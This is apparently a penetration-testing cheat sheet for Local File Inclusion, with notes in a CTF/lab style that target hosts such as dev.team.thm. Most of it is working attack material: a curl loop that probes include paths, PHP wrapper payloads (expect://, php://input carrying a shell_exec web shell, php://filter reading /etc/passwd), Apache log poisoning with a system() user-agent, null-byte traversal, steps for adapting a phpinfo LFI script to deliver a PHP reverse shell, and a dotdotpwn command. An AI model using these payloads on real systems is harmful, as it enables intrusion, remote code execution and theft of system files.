LFI

Check paths.txt for common acessible config files

while IFS="" read -r p || [ -n "$p" ]
do
  printf '%s\n' "$p"
  curl 'http://dev.team.thm/script.php?page='"$p"
done < paths.txt

PHP Wrappers

PHP Expect Wrapper

php?page=expect://ls

PHP Wrapper php://file

example1.php?page=php://input&cmd=ls

Then send post request with the following in the body

<?php echo shell_exec($_GET['cmd']);?>

PHP php://filter

vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

?page=php://filter/resource=/etc/passwd

Apache Log Poisoning through LFI

Check to see if you can access the access.log file

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

Change the user-agent to this:

<?php system($_GET['cmd']); ?>

Apache will execute the command and output the response into the access.log

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&cmd=whoami

Null Byte

http://ex.com/index.php?page=../../../etc/passwd%00

phpinfo LFI

Find the script on the PayloadALlTheThings/File Inclusion-Path Traversal git repository (phpinfolfi.py)

Modify the payload from the script with the payload from php-reverse-shell.php

locate php-reverse
/usr/share/laudanum/php/php-reverse-shell.php

Edit the IP address and the port

Check the LFIREQ variable.

Run script and listen for connection

dotdotpwn automation tool

dotdotpwn -m http -h IP -o windows